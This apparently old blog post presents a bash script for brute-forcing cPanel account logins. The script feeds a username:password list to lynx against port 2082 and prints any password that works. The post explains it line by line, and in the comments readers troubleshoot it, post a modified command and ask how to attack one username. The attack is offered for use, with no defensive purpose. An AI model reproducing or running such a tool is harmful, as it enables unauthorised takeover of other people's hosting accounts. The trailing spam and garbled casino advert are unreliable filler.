Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.
I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
#############################
echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site
n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do
password=`sed -n "$i"p pass_list`
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
echo trying password $password
if [ ! -z "$b" ]; then
echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================
lets explain what we did:
- #!/usr/bin/env bash
- read site
- n=`cat pass_list | wc -l`
- for (( i=1; i <= $n; i++));
- password=`sed -n "$i"p pass_list`
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.
- b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"
so password file pass_list should include the usernames and passwords in this format: "username:password"
- if [ ! -z "$b" ]; then
Thats all falks :)
Dr.Death
Is There Any Way To Use IT In Windows ?!! i dont know how i mean the bash script !
ReplyDeleteHello, yes you can run it with cygwin unix under windows.
ReplyDeletei tried it nice script but for sum reason lynx couldnt conect
ReplyDeleteHi, try first to connect to the target website using lynx for troubleshoot
ReplyDeletelynx "website.com"
lynx "website.com:2082"
check maybe the website doesn't run cpanel on it
hey how to run it in windows 7
ReplyDeletewhat file extension should i use?
ReplyDeleteGreat, thanx. Really useful, I added -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.
ReplyDeleteThe command ends up like this:
b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`
How how can i edit this code if i have username and i just want to brute pass for that username ?
ReplyDeletenice post frnd i like artical thanks for the artical
ReplyDeleteThanks owner for making this such a nice blog . .
ReplyDeleteskin beauty tips in hindi
Awesome Post!
ReplyDeletebaal ghane karne ka totka
hari chatni recipe in urdu
kabab banane ka tariqa
castor oil in urdu
cake banane ki recipe in urdu
Owsum website i have ever visit, keep it up.
ReplyDeleteUrdu Desi Totkay and Kitchen Recipe
Urdu Desi Totkay and Kitchen Recipe videos
Brilliant site ever. go to this site.
ReplyDeleteThanks for the sharing this review. Your site is awesome click here for info.
ReplyDeleteThe state will gather a tax of 10% on the web proceeds of sports activities betting exercise to fund implementation of the state water plan and other public functions. The quite a few 우리카지노 sports activities betting sites likeagen Judi Bolaallows you to start out|to begin} betting anytime you want. Moreover, tons of|there are numerous} reliable casinos that you simply won’t even have to search for extra before you begin betting. This means you can start betting each time and wherever you would like. Being ready for any outcome prepares you to manage your emotions.
ReplyDelete